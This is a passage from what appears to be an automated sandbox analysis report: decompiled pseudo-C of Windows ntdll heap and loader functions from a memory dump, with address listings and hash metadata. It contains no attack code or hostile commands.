						}
						__eflags =  *(_t81 + 0xc);
						if( *(_t81 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						E1D7CB910("About to free block at %p\n",  *0x1d8c47d0);
						goto L30;
					}
				} else {
					_t164 =  *0x1d8c3750; // 0x0
					 *0x1d8c91e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
					_t75 =  *_t164() & 0x000000ff;
					L35:
					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
					return _t75;
				}
			}























                                                                            0x1d87f8f8
                                                                            0x1d87f8fa
                                                                            0x1d87f8ff
                                                                            0x1d87f906
                                                                            0x1d87f909
                                                                            0x1d87f90b
                                                                            0x1d87f910
                                                                            0x1d87f912
                                                                            0x1d87f915
                                                                            0x1d87f91f
                                                                            0x1d87f93e
                                                                            0x1d87f941
                                                                            0x1d87f94f
                                                                            0x1d87f954
                                                                            0x1d87f956
                                                                            0x1d87fb8c
                                                                            0x1d87fb8e
                                                                            0x1d87fb91
                                                                            0x1d87fb91
                                                                            0x1d87fb94
                                                                            0x1d87fb9b
                                                                            0x1d87fba0
                                                                            0x00000000
                                                                            0x1d87fba0
                                                                            0x1d87f95f
                                                                            0x1d87f962
                                                                            0x1d87f96c
                                                                            0x1d87f96f
                                                                            0x1d87f972
                                                                            0x1d87f97a
                                                                            0x1d87f97f
                                                                            0x1d87f986
                                                                            0x1d87f986
                                                                            0x1d87f98b
                                                                            0x1d87f98b
                                                                            0x1d87f992
                                                                            0x1d87f99a
                                                                            0x1d87f99d
                                                                            0x1d87f9a1
                                                                            0x1d87f9aa
                                                                            0x1d87f9aa
                                                                            0x1d87f9aa
                                                                            0x1d87f9ac
                                                                            0x1d87f9af
                                                                            0x1d87f9b7
                                                                            0x1d87f9b9
                                                                            0x1d87f9be
                                                                            0x1d87f9c0
                                                                            0x00000000
                                                                            0x1d87f9c6
                                                                            0x1d87f9c9
                                                                            0x1d87f9cf
                                                                            0x1d87f9d5
                                                                            0x1d87fa1b
                                                                            0x1d87fa1e
                                                                            0x1d87fa21
                                                                            0x1d87fa26
                                                                            0x1d87fb2b
                                                                            0x1d87fb37
                                                                            0x1d87fb39
                                                                            0x1d87fb41
                                                                            0x1d87fb4b
                                                                            0x00000000
                                                                            0x1d87fb4b
                                                                            0x1d87fa2c
                                                                            0x1d87fa33
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d87fa39
                                                                            0x1d87fa3c
                                                                            0x1d87fa3f
                                                                            0x1d87fa42
                                                                            0x1d87fa47
                                                                            0x1d87fa49
                                                                            0x1d87fa4c
                                                                            0x1d87fa51
                                                                            0x1d87fa54
                                                                            0x1d87fa56
                                                                            0x1d87fa5b
                                                                            0x1d87fa60
                                                                            0x1d87fa60
                                                                            0x1d87fa54
                                                                            0x1d87fa63
                                                                            0x1d87fa67
                                                                            0x1d87fa79
                                                                            0x1d87fa7c
                                                                            0x1d87fa7f
                                                                            0x1d87fa69
                                                                            0x1d87fa6b
                                                                            0x1d87fa70
                                                                            0x1d87fa73
                                                                            0x1d87fa73
                                                                            0x1d87fa82
                                                                            0x1d87fa84
                                                                            0x1d87fa88
                                                                            0x1d87fa8b
                                                                            0x1d87fa8d
                                                                            0x1d87fa90
                                                                            0x1d87fa95
                                                                            0x1d87fa9b
                                                                            0x1d87fa9b
                                                                            0x1d87fa9b
                                                                            0x1d87fa9d
                                                                            0x1d87faa0
                                                                            0x1d87faa6
                                                                            0x1d87faad
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d87fab3
                                                                            0x1d87faba
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d87fabc
                                                                            0x1d87fac2
                                                                            0x1d87fac5
                                                                            0x1d87fae4
                                                                            0x1d87fae9
                                                                            0x1d87fac7
                                                                            0x1d87fadc
                                                                            0x1d87fae1
                                                                            0x1d87fafa
                                                                            0x1d87fb03
                                                                            0x1d87fb0b
                                                                            0x1d87fb0b
                                                                            0x1d87fb11
                                                                            0x1d87fb15
                                                                            0x1d87fb17
                                                                            0x1d87fb1e
                                                                            0x1d87fb24
                                                                            0x1d87fb25
                                                                            0x1d87fb25
                                                                            0x1d87fb15
                                                                            0x00000000
                                                                            0x1d87faa0
                                                                            0x1d87f9d7
                                                                            0x1d87f9da
                                                                            0x1d87f9f9
                                                                            0x1d87f9fe
                                                                            0x1d87f9dc
                                                                            0x1d87f9f1
                                                                            0x1d87f9f6
                                                                            0x1d87fa0f
                                                                            0x00000000
                                                                            0x1d87fa15
                                                                            0x1d87f921
                                                                            0x1d87f926
                                                                            0x1d87f92e
                                                                            0x1d87f936
                                                                            0x1d87fba2
                                                                            0x1d87fba5
                                                                            0x1d87fbb1
                                                                            0x1d87fbb1

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                            • API String ID: 3446177414-3492000579
                                                                            • Opcode ID: 9a204a27c0e98bf1062e611d128a2836a376353335bab54cced8f8b8046198ff
                                                                            • Instruction ID: 2ea4f947d3c9d19651b0ff1478d78a22a57e4c44cd8c203776693d2e2d913697
                                                                            • Opcode Fuzzy Hash: 9a204a27c0e98bf1062e611d128a2836a376353335bab54cced8f8b8046198ff
                                                                            • Instruction Fuzzy Hash: C571EE36904689DFCB01CF69D4906FDFBF2FF89314F06805AE5459B262CB35A980DB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D804C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 41%
                                                                            			E1D804C3D(void* __ecx) {
				char _v8;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_push(__ecx);
				_t45 = 0;
				_t42 = __ecx;
				_t51 =  *0x1d8c65e4; // 0x76f9f0e0
				if(_t51 == 0) {
					L10:
					return _t45;
				}
				_t40 =  *((intOrPtr*)(__ecx + 0x18));
				_t36 =  *0x1d8c5b24; // 0x1932c18
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
					_t24 =  *((intOrPtr*)(_t42 + 0x28));
					if(_t42 == _t36) {
						_t47 = 0x5c;
						if( *_t24 == _t47) {
							_t39 = 0x3f;
							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
								_t24 = _t24 + 8;
							}
						}
					}
					_t48 =  *0x1d8c65e4; // 0x76f9f0e0
					 *0x1d8c91e0(_t40, _t24,  &_v8);
					_t45 =  *_t48();
					if(_t45 >= 0) {
						L8:
						_t27 = _v8;
						if(_t27 != 0) {
							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
								E1D7D26A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
								_t27 = _v8;
							}
							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
						}
						if(_t45 < 0) {
							if(( *0x1d8c37c0 & 0x00000003) != 0) {
								E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
							}
							if(( *0x1d8c37c0 & 0x00000010) != 0) {
								asm("int3");
							}
						}
						goto L10;
					}
					if(_t45 != 0xc000008a) {
						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
							if(_t45 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1d8c37c0 & 0x00000005) != 0) {
						_push(_t45);
						_t18 = _t42 + 0x24; // 0x123
						E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
						_t49 = _t49 + 0x1c;
					}
					_t45 = 0;
					goto L8;
				} else {
					goto L10;
				}
			}















                                                                            0x1d804c42
                                                                            0x1d804c47
                                                                            0x1d804c4a
                                                                            0x1d804c4c
                                                                            0x1d804c52
                                                                            0x1d804cb8
                                                                            0x1d804cbe
                                                                            0x1d804cbe
                                                                            0x1d804c5a
                                                                            0x1d804c5d
                                                                            0x1d804c69
                                                                            0x1d804c6f
                                                                            0x1d804c74
                                                                            0x1d804cd6
                                                                            0x1d804cda
                                                                            0x1d8433b9
                                                                            0x1d8433be
                                                                            0x1d8433f7
                                                                            0x1d8433f7
                                                                            0x1d8433be
                                                                            0x1d804cda
                                                                            0x1d804c76
                                                                            0x1d804c84
                                                                            0x1d804c8c
                                                                            0x1d804c90
                                                                            0x1d804ca9
                                                                            0x1d804ca9
                                                                            0x1d804cae
                                                                            0x1d804ce4
                                                                            0x1d804cee
                                                                            0x1d804cf3
                                                                            0x1d804cf3
                                                                            0x1d804ce6
                                                                            0x1d804ce6
                                                                            0x1d804cb2
                                                                            0x1d843463
                                                                            0x1d84347b
                                                                            0x1d843480
                                                                            0x1d84348a
                                                                            0x1d843490
                                                                            0x1d843490
                                                                            0x1d84348a
                                                                            0x00000000
                                                                            0x1d804cb2
                                                                            0x1d804c98
                                                                            0x1d804cc5
                                                                            0x1d843429
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d84342f
                                                                            0x1d804cc5
                                                                            0x1d804ca1
                                                                            0x1d843434
                                                                            0x1d843435
                                                                            0x1d84344f
                                                                            0x1d843454
                                                                            0x1d843454
                                                                            0x1d804ca7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            Strings
                                                                            • LdrpFindDllActivationContext, xrefs: 1D843440, 1D84346C
                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1D843439
                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 1D84344A, 1D843476
                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 1D843466
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 3446177414-3779518884
                                                                            • Opcode ID: aedda66c305fa6dc367a709d4b63b1c9e949bb566a1cf70e6cd78fa12346aa52
                                                                            • Instruction ID: c22e42f4773ffcf0cd65b58363e3d6574462fbd4885be2a5bfed54ea71d3a84e
                                                                            • Opcode Fuzzy Hash: aedda66c305fa6dc367a709d4b63b1c9e949bb566a1cf70e6cd78fa12346aa52
                                                                            • Instruction Fuzzy Hash: 6131C472EC0696FFDB129B0C8C89BB9B3A4BB45768F16C12AF90457151D770AD80C2D3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7E0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 75%
                                                                            			E1D7E0680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = E1D7E0ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x1d8c6960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E1D7CB910();
						__eflags =  *0x1d8c5da8;
						if(__eflags == 0) {
							E1D88FC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x1d8c6d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x1d8c91e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push(0x1c);
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = E1D812BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E1D895FED(0, _t300, 1, _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x1d8c373c != 0) {
							L11:
							_push(_v16);
							_push(0x1000);
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E1D812B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E1D88EFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E1D88D646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t38 = _t298 + 8; // 0x8
								_t278 = _t38;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E1D895FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										E1D7E096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E1D895FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = E1D7E3C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E1D88F1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = E1D7E3C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E1D88F1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E1D7E036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E1D895FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E1D895FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x1d8c432c; // 0x0
						_v24 = 0x1d8c432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}
























































                                                                            0x1d7e0689
                                                                            0x1d7e068d
                                                                            0x1d7e0690
                                                                            0x1d7e0699
                                                                            0x1d7e06a3
                                                                            0x1d7e0929
                                                                            0x00000000
                                                                            0x1d7e0929
                                                                            0x1d7e06b0
                                                                            0x1d834e97
                                                                            0x1d834e99
                                                                            0x1d834e9f
                                                                            0x1d834ea5
                                                                            0x1d834ea9
                                                                            0x1d834eca
                                                                            0x1d834ecf
                                                                            0x1d834eab
                                                                            0x1d834ec0
                                                                            0x1d834ec5
                                                                            0x1d834ed7
                                                                            0x1d834edc
                                                                            0x1d834ee4
                                                                            0x1d834eeb
                                                                            0x1d834ef6
                                                                            0x1d834ef6
                                                                            0x1d834eeb
                                                                            0x1d834e99
                                                                            0x1d7e06b6
                                                                            0x1d7e06b9
                                                                            0x1d7e06b9
                                                                            0x1d7e06be
                                                                            0x1d7e0921
                                                                            0x1d7e06c4
                                                                            0x1d7e06c4
                                                                            0x1d7e06c4
                                                                            0x1d7e06ca
                                                                            0x1d7e06d3
                                                                            0x1d7e06d9
                                                                            0x1d7e06dc
                                                                            0x1d834f0a
                                                                            0x1d834f10
                                                                            0x1d834f13
                                                                            0x00000000
                                                                            0x1d7e06e2
                                                                            0x1d7e06e2
                                                                            0x1d7e06f2
                                                                            0x1d7e0930
                                                                            0x1d7e0936
                                                                            0x1d7e0938
                                                                            0x1d7e093e
                                                                            0x1d7e093e
                                                                            0x1d7e0938
                                                                            0x1d7e06ff
                                                                            0x1d834f1b
                                                                            0x1d834f1d
                                                                            0x1d834f22
                                                                            0x1d834f29
                                                                            0x1d834f2a
                                                                            0x1d834f2c
                                                                            0x1d834f2d
                                                                            0x1d834f2f
                                                                            0x1d834f34
                                                                            0x1d834f36
                                                                            0x1d834f39
                                                                            0x1d834f44
                                                                            0x1d834f4d
                                                                            0x1d834f4f
                                                                            0x1d834f54
                                                                            0x1d834f5b
                                                                            0x1d834f5b
                                                                            0x00000000
                                                                            0x1d834f5b
                                                                            0x1d834f3b
                                                                            0x1d834f3d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d834f3f
                                                                            0x1d834f42
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7e0705
                                                                            0x1d7e0705
                                                                            0x1d7e070c
                                                                            0x1d7e070e
                                                                            0x1d7e0724
                                                                            0x1d7e0727
                                                                            0x1d7e072d
                                                                            0x1d7e0730
                                                                            0x1d7e0751
                                                                            0x1d7e0751
                                                                            0x1d7e0757
                                                                            0x1d7e075c
                                                                            0x1d7e075d
                                                                            0x1d7e075f
                                                                            0x1d7e0760
                                                                            0x1d7e0762
                                                                            0x1d7e0767
                                                                            0x1d7e076a
                                                                            0x1d7e076a
                                                                            0x1d7e0770
                                                                            0x1d7e0772
                                                                            0x1d834f9f
                                                                            0x00000000
                                                                            0x1d834f9f
                                                                            0x1d7e077e
                                                                            0x1d7e0783
                                                                            0x1d834faa
                                                                            0x1d834fad
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d834fbc
                                                                            0x1d7e078e
                                                                            0x1d7e0791
                                                                            0x1d834fcc
                                                                            0x1d834fd3
                                                                            0x1d834fe2
                                                                            0x1d834fe2
                                                                            0x1d834fd3
                                                                            0x1d7e079b
                                                                            0x1d7e07a0
                                                                            0x1d7e07a4
                                                                            0x1d7e07b0
                                                                            0x1d7e07b7
                                                                            0x1d834fec
                                                                            0x1d834ff1
                                                                            0x1d834ff1
                                                                            0x1d7e07b7
                                                                            0x1d7e07bd
                                                                            0x1d7e07c1
                                                                            0x1d7e07c5
                                                                            0x1d7e07c8
                                                                            0x1d7e07cb
                                                                            0x1d7e07d0
                                                                            0x1d7e07d3
                                                                            0x1d7e07d3
                                                                            0x1d7e07d6
                                                                            0x1d835008
                                                                            0x1d7e07e4
                                                                            0x1d7e07e4
                                                                            0x1d7e07e6
                                                                            0x1d7e07e6
                                                                            0x1d7e07e9
                                                                            0x1d7e07ee
                                                                            0x1d7e081b
                                                                            0x1d7e081b
                                                                            0x1d7e081e
                                                                            0x1d7e0827
                                                                            0x1d7e082d
                                                                            0x1d7e0833
                                                                            0x1d7e0839
                                                                            0x1d7e083f
                                                                            0x1d7e0848
                                                                            0x1d7e08fd
                                                                            0x1d7e0903
                                                                            0x1d7e0903
                                                                            0x1d7e084e
                                                                            0x1d7e0851
                                                                            0x1d7e0855
                                                                            0x1d7e0945
                                                                            0x1d7e094d
                                                                            0x1d7e0950
                                                                            0x1d7e0953
                                                                            0x1d7e0964
                                                                            0x00000000
                                                                            0x1d7e0964
                                                                            0x1d7e0955
                                                                            0x00000000
                                                                            0x1d7e085b
                                                                            0x1d7e085b
                                                                            0x1d7e086e
                                                                            0x1d7e0876
                                                                            0x1d7e0879
                                                                            0x1d7e0879
                                                                            0x1d7e087c
                                                                            0x1d7e0880
                                                                            0x1d7e0885
                                                                            0x1d7e08dd
                                                                            0x1d7e08de
                                                                            0x1d7e08e1
                                                                            0x1d7e08e6
                                                                            0x1d7e08f3
                                                                            0x1d7e08f8
                                                                            0x1d7e08f8
                                                                            0x1d7e0887
                                                                            0x1d7e0887
                                                                            0x1d7e0887
                                                                            0x1d7e0889
                                                                            0x1d7e0892
                                                                            0x1d7e0897
                                                                            0x1d83505d
                                                                            0x1d835060
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83506f
                                                                            0x1d7e08a2
                                                                            0x1d7e08a5
                                                                            0x1d835079
                                                                            0x1d83507f
                                                                            0x1d835086
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d835091
                                                                            0x1d835093
                                                                            0x1d8350a5
                                                                            0x1d835095
                                                                            0x1d83509e
                                                                            0x1d83509e
                                                                            0x1d8350af
                                                                            0x1d8350be
                                                                            0x1d7e08ae
                                                                            0x1d7e08b4
                                                                            0x1d7e08b9
                                                                            0x1d8350c8
                                                                            0x1d8350cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8350da
                                                                            0x1d7e08c4
                                                                            0x1d7e08c7
                                                                            0x1d8350e9
                                                                            0x1d8350eb
                                                                            0x1d8350fd
                                                                            0x1d8350ed
                                                                            0x1d8350f6
                                                                            0x1d8350f6
